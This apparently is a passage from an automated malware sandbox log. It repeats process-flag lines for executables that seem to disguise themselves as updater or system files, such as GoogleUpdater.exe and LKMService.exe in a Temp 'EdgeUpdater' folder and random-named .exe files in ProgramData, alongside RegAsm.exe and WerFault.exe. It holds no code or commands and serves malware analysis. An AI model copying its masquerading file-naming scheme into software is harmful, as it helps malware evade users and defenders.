                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userCGHCGIIDGD.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userCGHCGIIDGD.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userCGHCGIIDGD.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userCGHCGIIDGD.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userCGHCGIIDGD.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userCGHCGIIDGD.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userCGHCGIIDGD.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userCGHCGIIDGD.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userCGHCGIIDGD.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userCGHCGIIDGD.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userCGHCGIIDGD.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userCGHCGIIDGD.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userCGHCGIIDGD.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userCGHCGIIDGD.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userCGHCGIIDGD.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userCGHCGIIDGD.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userCGHCGIIDGD.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userCGHCGIIDGD.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userCGHCGIIDGD.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userJEHDHIEGII.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userJEHDHIEGII.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userJEHDHIEGII.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userJEHDHIEGII.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userJEHDHIEGII.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userJEHDHIEGII.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userJEHDHIEGII.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userJEHDHIEGII.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userJEHDHIEGII.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userJEHDHIEGII.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userJEHDHIEGII.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userJEHDHIEGII.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userJEHDHIEGII.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userJEHDHIEGII.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userJEHDHIEGII.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userJEHDHIEGII.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userJEHDHIEGII.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userJEHDHIEGII.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\userJEHDHIEGII.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess information set: NOOPENFILEERRORBOX
